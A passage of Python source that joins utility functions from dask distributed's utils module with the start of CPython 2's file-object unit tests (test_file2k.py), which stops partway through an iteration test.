results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
"""Truncate exception to be about a certain length"""
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def validate_key(k):
"""Validate a key as received on a stream."""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError(f"Unexpected key type {typ} (value: {k!r})")
def _maybe_complex(task):
"""Possibly contains a nested task"""
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def seek_delimiter(file, delimiter, blocksize):
"""Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
def read_block(f, offset, length, delimiter=None):
"""Read a block of bytes from a file
Parameters
----------
f: file
File-like object supporting seek, read, tell, etc..
offset: int
Byte offset to start read
length: int
Number of bytes to read
delimiter: bytes (optional)
Ensure reading starts and stops at delimiter bytestring
If using the ``delimiter=`` keyword argument we ensure that the read
starts and stops at delimiter boundaries that follow the locations
``offset`` and ``offset + length``. If ``offset`` is zero then we
start at zero. The bytestring returned WILL include the
terminating delimiter string.
Examples
--------
>>> from io import BytesIO # doctest: +SKIP
>>> f = BytesIO(b'Alice, 100\\nBob, 200\\nCharlie, 300') # doctest: +SKIP
>>> read_block(f, 0, 13) # doctest: +SKIP
b'Alice, 100\\nBo'
>>> read_block(f, 0, 13, delimiter=b'\\n') # doctest: +SKIP
b'Alice, 100\\nBob, 200\\n'
>>> read_block(f, 10, 10, delimiter=b'\\n') # doctest: +SKIP
b'Bob, 200\\nCharlie, 300'
"""
if delimiter:
f.seek(offset)
seek_delimiter(f, delimiter, 2**16)
start = f.tell()
length -= start - offset
f.seek(start + length)
seek_delimiter(f, delimiter, 2**16)
end = f.tell()
offset = start
length = end - start
f.seek(offset)
bytes = f.read(length)
return bytes
def ensure_bytes(s):
"""Attempt to turn `s` into bytes.
Parameters
----------
s : Any
        The object to be converted. Will correctly handle
* str
* bytes
* objects implementing the buffer protocol (memoryview, ndarray, etc.)
Returns
-------
b : bytes
Raises
------
TypeError
When `s` cannot be converted
Examples
--------
>>> ensure_bytes('123')
b'123'
>>> ensure_bytes(b'123')
b'123'
"""
if isinstance(s, bytes):
return s
elif hasattr(s, "encode"):
return s.encode()
else:
try:
return bytes(s)
except Exception as e:
raise TypeError(
"Object %s is neither a bytes object nor has an encode method" % s
) from e
def open_port(host=""):
"""Return a probably-open port
There is a chance that this port will be taken by the operating system soon
after returning from this function.
"""
# http://stackoverflow.com/questions/2838244/get-open-tcp-port-in-python
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def import_file(path: str):
"""Loads modules for a file (.py, .zip, .egg)"""
directory, filename = os.path.split(path)
name, ext = os.path.splitext(filename)
names_to_import: list[str] = []
tmp_python_path: str | None = None
if ext in (".py",): # , '.pyc'):
if directory not in sys.path:
tmp_python_path = directory
names_to_import.append(name)
if ext == ".py": # Ensure that no pyc file will be reused
cache_file = cache_from_source(path)
with suppress(OSError):
os.remove(cache_file)
if ext in (".egg", ".zip", ".pyz"):
if path not in sys.path:
sys.path.insert(0, path)
names = (mod_info.name for mod_info in pkgutil.iter_modules([path]))
names_to_import.extend(names)
loaded: list[ModuleType] = []
if not names_to_import:
logger.warning("Found nothing to import from %s", filename)
else:
importlib.invalidate_caches()
if tmp_python_path is not None:
sys.path.insert(0, tmp_python_path)
try:
for name in names_to_import:
logger.info("Reload module %s from %s file", name, ext)
loaded.append(importlib.reload(importlib.import_module(name)))
finally:
if tmp_python_path is not None:
sys.path.remove(tmp_python_path)
return loaded
def asciitable(columns, rows):
"""Formats an ascii table for given columns and rows.
Parameters
----------
columns : list
The column names
rows : list of tuples
The rows in the table. Each tuple must be the same length as
``columns``.
"""
rows = [tuple(str(i) for i in r) for r in rows]
columns = tuple(str(i) for i in columns)
widths = tuple(max(max(map(len, x)), len(c)) for x, c in zip(zip(*rows), columns))
row_template = ("|" + (" %%-%ds |" * len(columns))) % widths
header = row_template % tuple(columns)
bar = "+%s+" % "+".join("-" * (w + 2) for w in widths)
data = "\n".join(row_template % r for r in rows)
return "\n".join([bar, header, bar, data, bar])
def nbytes(frame, _bytes_like=(bytes, bytearray)):
"""Number of bytes of a frame or memoryview"""
if isinstance(frame, _bytes_like):
return len(frame)
else:
try:
return frame.nbytes
except AttributeError:
return len(frame)
def json_load_robust(fn, load=json.load):
"""Reads a JSON file from disk that may be being written as we read"""
while not os.path.exists(fn):
sleep(0.01)
for i in range(10):
try:
with open(fn) as f:
cfg = load(f)
if cfg:
return cfg
except (ValueError, KeyError): # race with writing process
pass
sleep(0.1)
class DequeHandler(logging.Handler):
"""A logging.Handler that records records into a deque"""
_instances: ClassVar[weakref.WeakSet[DequeHandler]] = weakref.WeakSet()
def __init__(self, *args, n=10000, **kwargs):
self.deque = deque(maxlen=n)
super().__init__(*args, **kwargs)
self._instances.add(self)
def emit(self, record):
self.deque.append(record)
def clear(self):
"""
Clear internal storage.
"""
self.deque.clear()
@classmethod
def clear_all_instances(cls):
"""
Clear the internal storage of all live DequeHandlers.
"""
for inst in list(cls._instances):
inst.clear()
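# Minimal usage sketch for DequeHandler (the logger name and message are
# arbitrary): attach it to a logger, then read captured records back out of
# the deque.
def _deque_handler_usage_sketch():
    handler = DequeHandler(n=100)
    log = logging.getLogger("distributed.example")
    log.addHandler(handler)
    try:
        log.warning("disk is %d%% full", 92)
        assert handler.deque[-1].getMessage() == "disk is 92% full"
    finally:
        log.removeHandler(handler)
        handler.clear()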
def reset_logger_locks():
"""Python 2's logger's locks don't survive a fork event
https://github.com/dask/distributed/issues/1491
"""
for name in logging.Logger.manager.loggerDict.keys():
for handler in logging.getLogger(name).handlers:
handler.createLock()
@functools.lru_cache(1000)
def has_keyword(func, keyword):
return keyword in inspect.signature(func).parameters
@functools.lru_cache(1000)
def command_has_keyword(cmd, k):
if cmd is not None:
if isinstance(cmd, str):
try:
from importlib import import_module
cmd = import_module(cmd)
except ImportError:
raise ImportError("Module for command %s is not available" % cmd)
if isinstance(getattr(cmd, "main"), click.core.Command):
cmd = cmd.main
if isinstance(cmd, click.core.Command):
cmd_params = {
p.human_readable_name
for p in cmd.params
if isinstance(p, click.core.Option)
}
return k in cmd_params
return False
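# Illustrative usage sketch (``f`` is a hypothetical function): ``has_keyword``
# checks the callable's signature, while ``command_has_keyword`` inspects the
# options of a click command given as an object or an importable module name.
#
#     >>> def f(x, y=1):
#     ...     pass
#     >>> has_keyword(f, "y")
#     True
#     >>> has_keyword(f, "z")
#     False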
# from bokeh.palettes import viridis
# palette = viridis(18)
palette = [
"#440154",
"#471669",
"#472A79",
"#433C84",
"#3C4D8A",
"#355D8C",
"#2E6C8E",
"#287A8E",
"#23898D",
"#1E978A",
"#20A585",
"#2EB27C",
"#45BF6F",
"#64CB5D",
"#88D547",
"#AFDC2E",
"#D7E219",
"#FDE724",
]
@toolz.memoize
def color_of(x, palette=palette):
h = md5(str(x).encode())
n = int(h.hexdigest()[:8], 16)
return palette[n % len(palette)]
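# Illustrative usage sketch: the md5 digest makes the mapping deterministic, so
# the same key always maps to the same palette entry (the key is hypothetical).
#
#     >>> color_of("worker-1") == color_of("worker-1")
#     True
#     >>> color_of("worker-1") in palette
#     True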
def _iscoroutinefunction(f):
return inspect.iscoroutinefunction(f) or gen.is_coroutine_function(f)
@functools.lru_cache(None)
def _iscoroutinefunction_cached(f):
return _iscoroutinefunction(f)
def iscoroutinefunction(f):
# Attempt to use lru_cache version and fall back to non-cached version if needed
try:
return _iscoroutinefunction_cached(f)
except TypeError: # unhashable type
return _iscoroutinefunction(f)
@contextmanager
def warn_on_duration(duration, msg):
start = time()
yield
stop = time()
if stop - start > _parse_timedelta(duration):
warnings.warn(msg, stacklevel=2)
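# Illustrative usage sketch (duration, message and ``do_work`` are hypothetical):
# a warning is emitted only if the wrapped block took longer than the duration.
#
#     >>> with warn_on_duration("1s", "This block was slower than expected"):
#     ...     do_work()  # doctest: +SKIP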
def format_dashboard_link(host, port):
template = dask.config.get("distributed.dashboard.link")
if dask.config.get("distributed.scheduler.dashboard.tls.cert"):
scheme = "https"
else:
scheme = "http"
return template.format(
**toolz.merge(os.environ, dict(scheme=scheme, host=host, port=port))
)
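# Illustrative result sketch, assuming the default dask config template
# "{scheme}://{host}:{port}/status" and no TLS certificate configured:
#
#     >>> format_dashboard_link("127.0.0.1", 8787)  # doctest: +SKIP
#     'http://127.0.0.1:8787/status'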
def parse_ports(port):
"""Parse input port information into list of ports
Parameters
----------
port : int, str, None
Input port or ports. Can be an integer like 8787, a string for a
single port like "8787", a string for a sequential range of ports like
"8000:8200", or None.
Returns
-------
ports : list
List of ports
Examples
--------
A single port can be specified using an integer:
>>> parse_ports(8787)
[8787]
or a string:
>>> parse_ports("8787")
[8787]
A sequential range of ports can be specified by a string which indicates
the first and last ports which should be included in the sequence of ports:
>>> parse_ports("8787:8790")
[8787, 8788, 8789, 8790]
An input of ``None`` is also valid and can be used to indicate that no port
has been specified:
>>> parse_ports(None)
[None]
"""
if isinstance(port, str) and ":" not in port:
port = int(port)
if isinstance(port, (int, type(None))):
ports = [port]
else:
port_start, port_stop = map(int, port.split(":"))
if port_stop <= port_start:
raise ValueError(
"When specifying a range of ports like port_start:port_stop, "
"port_stop must be greater than port_start, but got "
f"{port_start=} and {port_stop=}"
)
ports = list(range(port_start, port_stop + 1))
return ports
is_coroutine_function = iscoroutinefunction
class Log(str):
"""A container for newline-delimited string of log entries"""
def _repr_html_(self):
return get_template("log.html.j2").render(log=self)
class Logs(dict):
"""A container for a dict mapping names to strings of log entries"""
def _repr_html_(self):
return get_template("logs.html.j2").render(logs=self)
def cli_keywords(d: dict, cls=None, cmd=None):
"""Convert a kwargs dictionary into a list of CLI keywords
Parameters
----------
d : dict
The keywords to convert
cls : callable
The callable that consumes these terms to check them for validity
cmd : string or object
A string with the name of a module, or the module containing a
click-generated command with a "main" function, or the function itself.
It may be used to parse a module's custom arguments (that is, arguments that
are not part of Worker class), such as nworkers from dask-worker CLI or
enable_nvlink from dask-cuda-worker CLI.
Examples
--------
>>> cli_keywords({"x": 123, "save_file": "foo.txt"})
['--x', '123', '--save-file', 'foo.txt']
>>> from dask.distributed import Worker
>>> cli_keywords({"x": 123}, Worker)
Traceback (most recent call last):
...
ValueError: Class distributed.worker.Worker does not support keyword x
"""
from dask.utils import typename
if cls or cmd:
for k in d:
if not has_keyword(cls, k) and not command_has_keyword(cmd, k):
if cls and cmd:
raise ValueError(
"Neither class %s or module %s support keyword %s"
% (typename(cls), typename(cmd), k)
)
elif cls:
raise ValueError(
f"Class {typename(cls)} does not support keyword {k}"
)
else:
raise ValueError(
f"Module {typename(cmd)} does not support keyword {k}"
)
def convert_value(v):
out = str(v)
if " " in out and "'" not in out and '"' not in out:
out = '"' + out + '"'
return out
return sum(
(["--" + k.replace("_", "-"), convert_value(v)] for k, v in d.items()), []
)
def is_valid_xml(text):
return xml.etree.ElementTree.fromstring(text) is not None
_offload_executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix="Dask-Offload")
weakref.finalize(_offload_executor, _offload_executor.shutdown)
def import_term(name: str):
"""Return the fully qualified term
Examples
--------
>>> import_term("math.sin") # doctest: +SKIP
<function math.sin(x, /)>
"""
try:
module_name, attr_name = name.rsplit(".", 1)
except ValueError:
return importlib.import_module(name)
module = importlib.import_module(module_name)
return getattr(module, attr_name)
async def offload(fn, *args, **kwargs):
loop = asyncio.get_event_loop()
# Retain context vars while deserializing; see https://bugs.python.org/issue34014
context = contextvars.copy_context()
return await loop.run_in_executor(
_offload_executor, lambda: context.run(fn, *args, **kwargs)
)
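# Illustrative usage sketch (``expensive_deserialize`` and ``frames`` are
# hypothetical): run a blocking function on the dedicated offload thread without
# blocking the event loop, while preserving the caller's context variables.
#
#     >>> result = await offload(expensive_deserialize, frames)  # doctest: +SKIP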
class EmptyContext:
def __enter__(self):
pass
def __exit__(self, *args):
pass
async def __aenter__(self):
pass
async def __aexit__(self, *args):
pass
empty_context = EmptyContext()
class LRU(UserDict):
"""Limited size mapping, evicting the least recently looked-up key when full"""
def __init__(self, maxsize):
super().__init__()
self.data = OrderedDict()
self.maxsize = maxsize
def __getitem__(self, key):
value = super().__getitem__(key)
self.data.move_to_end(key)
return value
def __setitem__(self, key, value):
if len(self) >= self.maxsize:
self.data.popitem(last=False)
super().__setitem__(key, value)
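# Illustrative behaviour sketch: looking a key up marks it as recently used, so
# inserting past ``maxsize`` evicts the least recently looked-up key.
#
#     >>> cache = LRU(maxsize=2)
#     >>> cache["a"] = 1
#     >>> cache["b"] = 2
#     >>> cache["a"]          # "a" becomes the most recently used key
#     1
#     >>> cache["c"] = 3      # evicts "b", the least recently looked-up key
#     >>> sorted(cache)
#     ['a', 'c']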
def clean_dashboard_address(addrs: AnyType, default_listen_ip: str = "") -> list[dict]:
"""
Examples
--------
>>> clean_dashboard_address(8787)
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address(":8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("8787")
[{'address': '', 'port': 8787}]
>>> clean_dashboard_address("foo:8787")
[{'address': 'foo', 'port': 8787}]
>>> clean_dashboard_address([8787, 8887])
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
>>> clean_dashboard_address(":8787,:8887")
[{'address': '', 'port': 8787}, {'address': '', 'port': 8887}]
"""
if default_listen_ip == "0.0.0.0":
default_listen_ip = "" # for IPV6
if isinstance(addrs, str):
addrs = addrs.split(",")
if not isinstance(addrs, list):
addrs = [addrs]
addresses = []
for addr in addrs:
try:
addr = int(addr)
except (TypeError, ValueError):
pass
if isinstance(addr, str):
addr = addr.split(":")
if isinstance(addr, (tuple, list)):
if len(addr) == 2:
host, port = (addr[0], int(addr[1]))
elif len(addr) == 1:
[host], port = addr, 0
else:
raise ValueError(addr)
elif isinstance(addr, int):
host = default_listen_ip
port = addr
addresses.append({"address": host, "port": port})
return addresses
_deprecations = {
"deserialize_for_cli": "dask.config.deserialize",
"serialize_for_cli": "dask.config.serialize",
"format_bytes": "dask.utils.format_bytes",
"format_time": "dask.utils.format_time",
"funcname": "dask.utils.funcname",
"parse_bytes": "dask.utils.parse_bytes",
"parse_timedelta": "dask.utils.parse_timedelta",
"typename": "dask.utils.typename",
"tmpfile": "dask.utils.tmpfile",
}
def __getattr__(name):
if name in _deprecations:
use_instead = _deprecations[name]
warnings.warn(
f"{name} is deprecated and will be removed in a future release. "
f"Please use {use_instead} instead.",
category=FutureWarning,
stacklevel=2,
)
return import_term(use_instead)
else:
raise AttributeError(f"module {__name__} has no attribute {name}")
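# Illustrative effect sketch, assuming this module is imported as
# ``distributed.utils``: accessing one of the deprecated names emits a
# FutureWarning and transparently returns the replacement from dask.
#
#     >>> from distributed.utils import format_bytes  # doctest: +SKIP
#     FutureWarning: format_bytes is deprecated ... Please use dask.utils.format_bytes instead.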
# Used internally by recursive_to_dict to stop infinite recursion. If an object has
# already been encountered, a string representation will be returned instead. This is
# necessary since we have multiple cyclic referencing data structures.
_recursive_to_dict_seen: ContextVar[set[int]] = ContextVar("_recursive_to_dict_seen")
_to_dict_no_nest_flag = False
def recursive_to_dict(
obj: AnyType, *, exclude: Container[str] = (), members: bool = False
) -> AnyType:
"""Recursively convert arbitrary Python objects to a JSON-serializable
representation. This is intended for debugging purposes only.
The following objects are supported:
list, tuple, set, frozenset, deque, dict, dict_keys, dict_values
Descended into these objects recursively. Python-specific collections are
converted to JSON-friendly variants.
Classes that define ``_to_dict(self, *, exclude: Container[str] = ())``:
Call the method and dump its output
Classes that define ``_to_dict_no_nest(self, *, exclude: Container[str] = ())``:
Like above, but prevents nested calls (see below)
Other Python objects
Dump the output of ``repr()``
Objects already encountered before, regardless of type
Dump the output of ``repr()``. This breaks circular references and shortens the
output.
Parameters
----------
exclude:
A list of attribute names to be excluded from the dump.
        This will be forwarded to the objects' ``_to_dict`` methods, which are
        required to accept this parameter.
members:
If True, convert the top-level Python object to a dict of its public members
**``_to_dict_no_nest`` vs. ``_to_dict``**
    The presence of a ``_to_dict_no_nest`` method signals ``recursive_to_dict`` that
    objects defining it should not be expanded inside one another, regardless of
    their class: only the outermost such object in a nested structure has the method
    invoked; all others are dumped as their string repr instead, even if they were
    not encountered before.
Example:
.. code-block:: python
>>> class Person:
... def __init__(self, name):
... self.name = name
... self.children = []
... self.pets = []
...
... def _to_dict_no_nest(self, exclude=()):
... return recursive_to_dict(self.__dict__, exclude=exclude)
...
... def __repr__(self):
... return self.name
>>> class Pet:
... def __init__(self, name):
... self.name = name
... self.owners = []
...
... def _to_dict_no_nest(self, exclude=()):
... return recursive_to_dict(self.__dict__, exclude=exclude)
...
... def __repr__(self):
... return self.name
>>> alice = Person("Alice")
>>> bob = Person("Bob")
>>> charlie = Pet("Charlie")
>>> alice.children.append(bob)
>>> alice.pets.append(charlie)
>>> bob.pets.append(charlie)
>>> charlie.owners[:] = [alice, bob]
>>> recursive_to_dict({"people": [alice, bob], "pets": [charlie]})
{
"people": [
{"name": "Alice", "children": ["Bob"], "pets": ["Charlie"]},
{"name": "Bob", "children": [], "pets": ["Charlie"]},
],
"pets": [
{"name": "Charlie", "owners": ["Alice", "Bob"]},
],
}
If we changed the methods to ``_to_dict``, the output would instead be:
.. code-block:: python
{
"people": [
{
"name": "Alice",
"children": [
{
"name": "Bob",
"children": [],
"pets": [{"name": "Charlie", "owners": ["Alice", "Bob"]}],
},
],
pets: ["Charlie"],
],
"Bob",
],
"pets": ["Charlie"],
}
    Also notice that if someone later swaps the creation of the ``children`` and
    ``pets`` attributes inside ``Person.__init__``, the output with ``_to_dict``
    will change completely, whereas the one with ``_to_dict_no_nest`` won't!
"""
if isinstance(obj, (int, float, bool, str)) or obj is None:
return obj
if isinstance(obj, (type, bytes)):
return repr(obj)
if members:
obj = {
k: v
for k, v in inspect.getmembers(obj)
if not k.startswith("_") and k not in exclude and not callable(v)
}
# Prevent infinite recursion
try:
seen = _recursive_to_dict_seen.get()
except LookupError:
seen = set()
seen = seen.copy()
tok = _recursive_to_dict_seen.set(seen)
try:
if id(obj) in seen:
return repr(obj)
if hasattr(obj, "_to_dict_no_nest"):
global _to_dict_no_nest_flag
if _to_dict_no_nest_flag:
return repr(obj)
seen.add(id(obj))
_to_dict_no_nest_flag = True
try:
return obj._to_dict_no_nest(exclude=exclude)
finally:
_to_dict_no_nest_flag = False
seen.add(id(obj))
if hasattr(obj, "_to_dict"):
return obj._to_dict(exclude=exclude)
if isinstance(obj, (list, tuple, set, frozenset, deque, KeysView, ValuesView)):
return [recursive_to_dict(el, exclude=exclude) for el in obj]
if isinstance(obj, dict):
res = {}
for k, v in obj.items():
k = recursive_to_dict(k, exclude=exclude)
v = recursive_to_dict(v, exclude=exclude)
try:
res[k] = v
except TypeError:
res[str(k)] = v
return res
return repr(obj)
finally:
tok.var.reset(tok)
|
test_file2k.py
|
import sys
import os
import unittest
import itertools
import time
from array import array
from weakref import proxy
try:
import threading
except ImportError:
threading = None
from test import test_support
from test.test_support import TESTFN, run_unittest
from UserList import UserList
class AutoFileTests(unittest.TestCase):
# file tests for which a test file is automatically set up
def setUp(self):
self.f = open(TESTFN, 'wb')
def tearDown(self):
if self.f:
self.f.close()
os.remove(TESTFN)
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def testWeakRefs(self):
# verify weak references
p = proxy(self.f)
p.write('teststring')
self.assertEqual(self.f.tell(), p.tell())
self.f.close()
self.f = None
self.assertRaises(ReferenceError, getattr, p, 'tell')
def testAttributes(self):
# verify expected attributes exist
f = self.f
with test_support.check_py3k_warnings():
softspace = f.softspace
f.name # merely shouldn't blow up
f.mode # ditto
f.closed # ditto
with test_support.check_py3k_warnings():
# verify softspace is writable
f.softspace = softspace # merely shouldn't blow up
# verify the others aren't
for attr in 'name', 'mode', 'closed':
self.assertRaises((AttributeError, TypeError), setattr, f, attr, 'oops')
def testReadinto(self):
# verify readinto
self.f.write('12')
self.f.close()
a = array('c', 'x'*10)
self.f = open(TESTFN, 'rb')
n = self.f.readinto(a)
self.assertEqual('12', a.tostring()[:n])
def testWritelinesUserList(self):
# verify writelines with instance sequence
l = UserList(['1', '2'])
self.f.writelines(l)
self.f.close()
self.f = open(TESTFN, 'rb')
buf = self.f.read()
self.assertEqual(buf, '12')
def testWritelinesIntegers(self):
# verify writelines with integers
self.assertRaises(TypeError, self.f.writelines, [1, 2, 3])
def testWritelinesIntegersUserList(self):
# verify writelines with integers in UserList
l = UserList([1,2,3])
self.assertRaises(TypeError, self.f.writelines, l)
def testWritelinesNonString(self):
# verify writelines with non-string object
class NonString:
pass
self.assertRaises(TypeError, self.f.writelines,
[NonString(), NonString()])
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def testRepr(self):
# verify repr works
self.assertTrue(repr(self.f).startswith("<open file '" + TESTFN))
# see issue #14161
# Windows doesn't like \r\n\t" in the file name, but ' is ok
fname = 'xx\rxx\nxx\'xx"xx' if sys.platform != "win32" else "xx'xx"
with open(fname, 'w') as f:
self.addCleanup(os.remove, fname)
self.assertTrue(repr(f).startswith(
"<open file %r, mode 'w' at" % fname))
def testErrors(self):
self.f.close()
self.f = open(TESTFN, 'rb')
f = self.f
self.assertEqual(f.name, TESTFN)
self.assertTrue(not f.isatty())
self.assertTrue(not f.closed)
self.assertRaises(TypeError, f.readinto, "")
f.close()
self.assertTrue(f.closed)
def testMethods(self):
methods = ['fileno', 'flush', 'isatty', 'next', 'read', 'readinto',
'readline', 'readlines', 'seek', 'tell', 'truncate',
'write', '__iter__']
deprecated_methods = ['xreadlines']
if sys.platform.startswith('atheos'):
methods.remove('truncate')
# __exit__ should close the file
self.f.__exit__(None, None, None)
self.assertTrue(self.f.closed)
for methodname in methods:
method = getattr(self.f, methodname)
# should raise on closed file
self.assertRaises((TypeError, ValueError), method)
with test_support.check_py3k_warnings():
for methodname in deprecated_methods:
method = getattr(self.f, methodname)
self.assertRaises(ValueError, method)
self.assertRaises(ValueError, self.f.writelines, [])
# file is closed, __exit__ shouldn't do anything
self.assertEqual(self.f.__exit__(None, None, None), None)
# it must also return None if an exception was given
try:
1 // 0
except:
self.assertEqual(self.f.__exit__(*sys.exc_info()), None)
def testReadWhenWriting(self):
self.assertRaises(IOError, self.f.read)
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def testNastyWritelinesGenerator(self):
def nasty():
for i in range(5):
if i == 3:
self.f.close()
yield str(i)
self.assertRaises(ValueError, self.f.writelines, nasty())
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def testIssue5677(self):
# Remark: Do not perform more than one test per open file,
# since that does NOT catch the readline error on Windows.
data = 'xxx'
for mode in ['w', 'wb', 'a', 'ab']:
for attr in ['read', 'readline', 'readlines']:
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, getattr(self.f, attr))
self.f.close()
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, lambda: [line for line in self.f])
self.f.close()
self.f = open(TESTFN, mode)
self.f.write(data)
self.assertRaises(IOError, self.f.readinto, bytearray(len(data)))
self.f.close()
for mode in ['r', 'rb', 'U', 'Ub', 'Ur', 'rU', 'rbU', 'rUb']:
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.write, data)
self.f.close()
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.writelines, [data, data])
self.f.close()
self.f = open(TESTFN, mode)
self.assertRaises(IOError, self.f.truncate)
self.f.close()
class OtherFileTests(unittest.TestCase):
def testOpenDir(self):
this_dir = os.path.dirname(__file__) or os.curdir
for mode in (None, "w"):
try:
if mode:
f = open(this_dir, mode)
else:
f = open(this_dir)
except IOError as e:
self.assertEqual(e.filename, this_dir)
else:
self.fail("opening a directory didn't raise an IOError")
def testModeStrings(self):
# check invalid mode strings
for mode in ("", "aU", "wU+"):
try:
f = open(TESTFN, mode)
except ValueError:
pass
else:
f.close()
self.fail('%r is an invalid file mode' % mode)
# Some invalid modes fail on Windows, but pass on Unix
# Issue3965: avoid a crash on Windows when filename is unicode
for name in (TESTFN, unicode(TESTFN), unicode(TESTFN + '\t')):
try:
f = open(name, "rr")
except (IOError, ValueError):
pass
else:
f.close()
def testStdin(self):
# This causes the interpreter to exit on OSF1 v5.1.
if sys.platform != 'osf1V5':
self.assertRaises(IOError, sys.stdin.seek, -1)
else:
print >>sys.__stdout__, (
' Skipping sys.stdin.seek(-1), it may crash the interpreter.'
' Test manually.')
self.assertRaises(IOError, sys.stdin.truncate)
def testUnicodeOpen(self):
# verify repr works for unicode too
f = open(unicode(TESTFN), "w")
self.assertTrue(repr(f).startswith("<open file u'" + TESTFN))
f.close()
os.unlink(TESTFN)
def testBadModeArgument(self):
# verify that we get a sensible error message for bad mode argument
bad_mode = "qwerty"
try:
f = open(TESTFN, bad_mode)
except ValueError, msg:
if msg.args[0] != 0:
s = str(msg)
if TESTFN in s or bad_mode not in s:
self.fail("bad error message for invalid mode: %s" % s)
# if msg.args[0] == 0, we're probably on Windows where there may
# be no obvious way to discover why open() failed.
else:
f.close()
self.fail("no error for invalid mode: %s" % bad_mode)
def testSetBufferSize(self):
# make sure that explicitly setting the buffer size doesn't cause
# misbehaviour especially with repeated close() calls
for s in (-1, 0, 1, 512):
try:
f = open(TESTFN, 'w', s)
f.write(str(s))
f.close()
f.close()
f = open(TESTFN, 'r', s)
d = int(f.read())
f.close()
f.close()
except IOError, msg:
self.fail('error setting buffer size %d: %s' % (s, str(msg)))
self.assertEqual(d, s)
def testTruncateOnWindows(self):
os.unlink(TESTFN)
def bug801631():
# SF bug <http://www.python.org/sf/801631>
# "file.truncate fault on windows"
f = open(TESTFN, 'wb')
f.write('12345678901') # 11 bytes
f.close()
f = open(TESTFN,'rb+')
data = f.read(5)
if data != '12345':
self.fail("Read on file opened for update failed %r" % data)
if f.tell() != 5:
self.fail("File pos after read wrong %d" % f.tell())
f.truncate()
if f.tell() != 5:
self.fail("File pos after ftruncate wrong %d" % f.tell())
f.close()
size = os.path.getsize(TESTFN)
if size != 5:
self.fail("File size after ftruncate wrong %d" % size)
try:
bug801631()
finally:
os.unlink(TESTFN)
@unittest.skipIf(test_support.is_jython, "FIXME: Not working on Jython")
def testIteration(self):
# Test the complex interaction when mixing file-iteration and the
# various read* methods. Ostensibly, the mixture could just be tested
# to work when it should work according to the Python language,
# instead of fail when it should fail according to the current CPython
# implementation. People don't always program Python the way they
        # should, though, and the implementation might change in subtle ways,
# so we explicitly test for errors, too; the test will just have to
# be updated when the implementation changes.
dataoffset = 16384
filler = "ham\n"
assert not dataoffset % len(filler), \
"dataoffset must be multiple of len(filler)"
nchunks = dataoffset // len(filler)
testlines = [
"spam, spam and eggs\n",
"eggs, spam, ham and spam\n",
"saussages, spam, spam and eggs\n",
"spam, ham, spam and eggs\n",
"spam, spam, spam, spam, spam, ham, spam\n",
"wonderful spaaaaaam.\n"
]
methods = [("readline", ()), ("read", ()), ("readlines", ()),
("readinto", (array("c", " "*100),))]
try:
# Prepare the testfile
bag = open(TESTFN, "w")
bag.write(filler * nchunks)
bag.writelines(testlines)
bag.close()
# Test for appropriate errors mixing read* and iteration
for methodname, args in methods:
f = open(TESTFN)
if f.next() != filler:
self.fail, "Broken testfile"
meth = getattr(f, methodname)
try:
meth(*args)
except ValueError:
pass
else:
self.fail("%s%r after next() didn't raise ValueError" %
(methodname, args))
f.close()
# Test to see if harmless (by accident) mixing of read* and
# iteration still works. This depends on the size of the internal
# iteration buffer (currently 8192,) but we can test it in a
# flexible manner. Each line in the bag o' ham is 4 bytes
# ("h", "a", "m", "\n"), so 4096 lines of that should get us
# exactly on the buffer boundary for any power-of-2 buffersize
# between 4 and 16384 (inclusive).
f = open(TESTFN)
for i in range(nchunks):
f.next()
testline = testlines.pop(0)
try:
line = f.readline()
except ValueError:
self.fail("readline() after next() with supposedly empty "
"iteration-buffer failed anyway")
if line != testline:
self.fail("readline() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
testline = testlines.pop(0)
buf = array("c", "\x00" * len(testline))
try:
f.readinto(buf)
except ValueError:
self.fail("readinto() after next() with supposedly empty "
"iteration-buffer failed anyway")
line = buf.tostring()
if line != testline:
self.fail("readinto() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
testline = testlines.pop(0)
try:
line = f.read(len(testline))
except ValueError:
self.fail("read() after next() with supposedly empty "
"iteration-buffer failed anyway")
if line != testline:
self.fail("read() after next() with empty buffer "
"failed. Got %r, expected %r" % (line, testline))
try:
lines = f.readlines()
except ValueError:
self.fail("readlines() after next() with supposedly empty "
"iteration-buffer failed anyway")
if lines != testlines:
